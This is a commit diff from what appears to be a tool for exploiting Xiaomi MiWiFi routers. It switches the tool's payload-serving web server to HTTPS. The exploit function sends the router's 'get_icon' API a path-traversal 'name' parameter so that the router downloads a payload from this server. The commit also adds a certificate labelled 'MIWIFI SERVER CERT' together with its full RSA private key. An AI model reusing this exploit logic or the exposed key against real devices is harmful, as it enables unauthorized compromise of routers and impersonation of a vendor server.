connect7: Use HTTPS server for receiving WEB-requests from Router

3 days ago · 3f4071ec99
parent 4a9e1003b6
commit 3f4071ec99
3 changed files with 82 additions and 3 deletions
--- a/connect7.py
+++ b/connect7.py
@ -36,25 +36,44 @@ if api_get_icon_status <= 0:
    raise ExploitNotWorked('Exploit "get_icon" not working!!! (api not founded)')


+import threading
 from http.server import HTTPServer, SimpleHTTPRequestHandler
 from http.server import BaseHTTPRequestHandler
 from http import HTTPStatus
 from http import server as http_server

+srvInitEvent = threading.Event()
+
 class XmirHttpServer(HTTPServer):
    timeout = 3
    retcode = 0
    
    def server_bind(self):
-        HTTPServer.server_bind(self)
+        import ssl
+        root_dir = os.path.dirname(os.path.abspath(__file__))
+        certfile = f'{root_dir}\\data\\https\\cert.crt'
+        keyfile  = f'{root_dir}\\data\\https\\cert.key'
+        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
+        ctx.check_hostname = False
+        ctx.verify_mode = ssl.CERT_OPTIONAL
+        ctx.load_cert_chain(certfile = certfile, keyfile = keyfile)
+        self.socket = ctx.wrap_socket(self.socket, server_side = True)
+        super().server_bind()
+        
+    def server_activate(self):
+        global srvInitEvent
+        super().server_activate()
        print(f'SERVER: start and wait request from client...')
+        srvInitEvent.set()
        
    def handle_timeout(self):
        print(f"SERVER: Timed out! (timeout = {self.timeout})")
        self.retcode = -1
        
    def __del__(self):
+        global srvInitEvent
        print(f'SERVER: destroy with retcode = {self.retcode}')
+        srvInitEvent.clear()

 class HttpHandler(BaseHTTPRequestHandler):
    protocol_version = 'HTTP/1.1'
@ -84,7 +103,7 @@ def wait_req_and_send_resp(path, data, bind_addr = '0.0.0.0', ret_code = None, t
    srv = XmirHttpServer((bind_addr, srv_port), HttpHandler)
    srv.action_path = path
    srv.resp_body = data.encode('utf-8') if isinstance(data, str) else data
-    srv.timeout = 5 + timeout
+    srv.timeout = timeout
    srv.handle_request()
    if isinstance(ret_code, list):
        ret_code[0] = srv.retcode
@ -145,12 +164,16 @@ def install_exploit(api = 'API/xqsystem/get_icon'):
    # exploit public: https://archive.md/1PWkM
    # discovery date: 2024-12-30
    #######
-    global gw, srv_ip_addr, srv_port
+    global gw, srv_ip_addr, srv_port, srvInitEvent
    from threading import Thread
    srv_timeout = 3
    ret_code = [ None ]    
+    srvInitEvent.clear()
    server = Thread(target = wait_req_and_send_resp, args = [ payload_name, payload_body, srv_ip_addr, ret_code, srv_timeout ])
    server.start()
+    event_set = srvInitEvent.wait(timeout = 15)
+    if not event_set:
+        raise RuntimeError(f'Cannot initialize custom HTTPS server on TCP port {srv_port}')
    params = { 'ip': f'{srv_ip_addr}:{srv_port}', 'name': f'/../..{payload_name} dummy' }
    resp = gw.api_request(api, params, stream = True, timeout = 12)
    try:
--- a/data/https/cert.crt
+++ b/data/https/cert.crt
@ -0,0 +1,29 @@
+-----BEGIN CERTIFICATE-----
+MIIFDDCCA/SgAwIBAgIUeha5V95blhAwY03e3h3H+xfT5gQwDQYJKoZIhvcNAQEL
+BQAwdDELMAkGA1UEBhMCQ04xEDAOBgNVBAgTB0JlaUppbmcxEDAOBgNVBAcTB0Jl
+aUppbmcxDzANBgNVBAoTBlhJQU9NSTEXMBUGA1UECxMOTUlXSUZJIFJPT1QgQ0Ex
+FzAVBgNVBAMTDk1JV0lGSSBST09UIENBMCAXDTIwMTAzMDA4MjYyMVoYDzIxMjAx
+MDMwMDg0NjIxWjB8MQswCQYDVQQGEwJDTjEQMA4GA1UECBMHQmVpSmluZzEQMA4G
+A1UEBxMHQmVpSmluZzEPMA0GA1UEChMGWElBT01JMRswGQYDVQQLExJNSVdJRkkg
+U0VSVkVSIENFUlQxGzAZBgNVBAMTEk1JV0lGSSBTRVJWRVIgQ0VSVDCCASIwDQYJ
+KoZIhvcNAQEBBQADggEPADCCAQoCggEBAK/Tas6ls0dQiBd++cEud+iTOY51aVdu
+1dNkPucb6wc1NWUr0GT2pRnE0UpQDs3hH+TNETdzQ5fKR2bNDo7d9hpz2B2cnrYE
+SPTH2m6BetVY+XOHusTs4x4y3c7H4Ny2F5Ak/cELzDubcbFYBidVVNaduffrozCw
+p62Y2Jf3xyREuEwAqgge7B2sRU1ZSMTtIuTEV6dcqHHZWbSLN3YMZII1QMvYI0W9
+mZZzRCLDHT+FPm8YPj+DRgbg2x8ZbMZ4ssAexv5iKp3zwI3C9UfVqGu1BK9022yK
+TPlFFTxYPzeH7raD08OtPTT047veONAI1klJLCR0jlUeZq9+lLcQ4PkCAwEAAaOC
+AYowggGGMA4GA1UdDwEB/wQEAwIDiDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNV
+HRMBAf8EAjAAMB0GA1UdDgQWBBT8+kDf2DYqzu4izAU5T2XfUOfDsTAfBgNVHSME
+GDAWgBRLf4ugE1zHbUCMpgbG2rDbzwK8JTCBhgYIKwYBBQUHAQEEejB4MC0GCCsG
+AQUFBzABhiFodHRwOi8vY2EubWlvZmZpY2UuY24vbWl3aWZpLW9jc3AwRwYIKwYB
+BQUHMAKGO2h0dHA6Ly9jYS5taW9mZmljZS5jbi9taXdpZmktY2FkYXRhL21pd2lm
+aS1pbnRlcm1lZGlhdGUucGVtMDoGA1UdEQQzMDGCCm1pd2lmaS5jb22CEXJvdXRl
+ci5taXdpZmkuY29thwTAqB8BhwR/AAABhwTAqAEBMEwGA1UdHwRFMEMwQaA/oD2G
+O2h0dHA6Ly9jYS5taW9mZmljZS5jbi9taXdpZmktY2FkYXRhL21pd2lmaS1pbnRl
+cm1lZGlhdGUuY3JsMA0GCSqGSIb3DQEBCwUAA4IBAQAK5BpgLojRv1ZJ/k6FQ5iz
+Wk0xoIZ+opsrKNEyrcEQnMHVGLWVHtayzKSopnsFicelG+2ibPDpnSBNkBGiTZWa
+RNpm+COBoGmvim/RX+ZKAmrrBvO6NI8pnGSBqyVKy8U4mJyL2DO17+YHRF3L1lcN
+VtKG3k6c5vcywwLa8BPEKZYJMGKLfQVtK6DTkcTwWiusRJu7o3FspBvT0VNfJx4e
+9VC52nofradxSihjqjVjxoM8+0deJw3Pi4HW+OEZ1VCLy7STu+sn6H2OTD7pCSFx
+CQcBworO2KVMg/s5IRsMnJ3nzGUIgYrWuk1jeoM3qmYHsq9j6dLAsc8ev+OJzCiU
+-----END CERTIFICATE-----
--- a/data/https/cert.key
+++ b/data/https/cert.key
@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEpgIBAAKCAQEAr9NqzqWzR1CIF375wS536JM5jnVpV27V02Q+5xvrBzU1ZSvQ
+ZPalGcTRSlAOzeEf5M0RN3NDl8pHZs0Ojt32GnPYHZyetgRI9MfaboF61Vj5c4e6
+xOzjHjLdzsfg3LYXkCT9wQvMO5txsVgGJ1VU1p259+ujMLCnrZjYl/fHJES4TACq
+CB7sHaxFTVlIxO0i5MRXp1yocdlZtIs3dgxkgjVAy9gjRb2ZlnNEIsMdP4U+bxg+
+P4NGBuDbHxlsxniywB7G/mIqnfPAjcL1R9Woa7UEr3TbbIpM+UUVPFg/N4futoPT
+w609NPTju9440AjWSUksJHSOVR5mr36UtxDg+QIDAQABAoIBAQCur4X2OXqc583O
+SkEpRVmsoFkWyGAYle2rUHWOd5ZSWvLpyVYKeWIe8ARfqJqMwZZGY9cvGD2XmUjH
+QgOsvam9LksRYIHupOM3Dzhdghbf0L5FohxVemVLo43r23n0zpUqiRXzrh0DO7UB
+VUsH2Seo8pvJTTudLGXre2f11B7uUBDUsvKS2zrJfP/uymlqsSddXag1tVDjb3gm
+99IU7RFS3qWMoNKKOqAI/VksMe4H2sWUhG367wEs2g69xPBk+vudrZRaXw2UEFzf
+zw40ztJDzMm8LgbabRYZITnApN8FeEOIbwrQVhruqSmWPYKhgWR8u0XWEY1Zypuk
+Y6uoeDfhAoGBAOh4jAcFYFfl6uXhYX4WjC19OzgS3Y5VK0fR4av51kQbS63K2cik
+k8xCdTCYUUmuFZsGPZqwGd5imf7kH7R3558oRHSASGB5U+PNWxRt8abOc+aDnrP3
+L41GpfRIZpAviU83pcnpKrvVqQ5k90ywAFi5t2FgJw+6+kWjzuCkWOzXAoGBAMGf
+KkCJ2ImRZg7ClOavqIHZoRGqFVRUWerrsIX+Xo0bA+YvfP0zXsrUPRnDNLwo4arV
+3S1EH7l//4qDzqrWVpIYto03aU3jtmkoyNNnwfIg/D6QhSZC60aLv2uNoZq8CYiQ
+MCaav/vtg0ju86hYwmuDjiIjrA/PTDX/ZAavZ5avAoGBAND8LcXSC355buYh6ycS
+1gm+3xHVw99EqZfzElEsVHb9otcl2QsLCONDi16YT9tQ6JNo1NDPJzJIqe/+3JG8
+iTkHViL1gBtadxP/dLW08NzoFEFSacWXneP/cwlcXPeaBHJ2sFAHkSczOLt8AOWs
+A2O/8R9U9Uiq6nrYfA5vMJIZAoGBAIJPJ7WV0EkNtR0b8fCrqgHyQQfNa1t9BaMo
+in4zqtjWpLInpbwW9aYWXyTWjshPz0kVdCzB24QR1B8aBF5PsKXUwg+aimGkbqCp
+lTdKbmoRrxJAW4xbn1K0PNka0fd8tAHX4MAqiCj6OdA9GXlkezy2plLtpSBiyIzS
+3DPvmwz7AoGBAOeor9RMP2BrPWBstvoB3VQ26wMISQtOF52ukPaaFYBhgBfMUjo7
+dyhQblPT/VF622Nn1Y0qssXUod6tE0haREoipyK9gYryev5lD6ndd8gHVD1xz8FV
+yjqN9LCOz6wBnskRJgYe6Tk02J3s13ZSRKKSZLDFYym/Yw3FlPUyPC3u
+-----END RSA PRIVATE KEY-----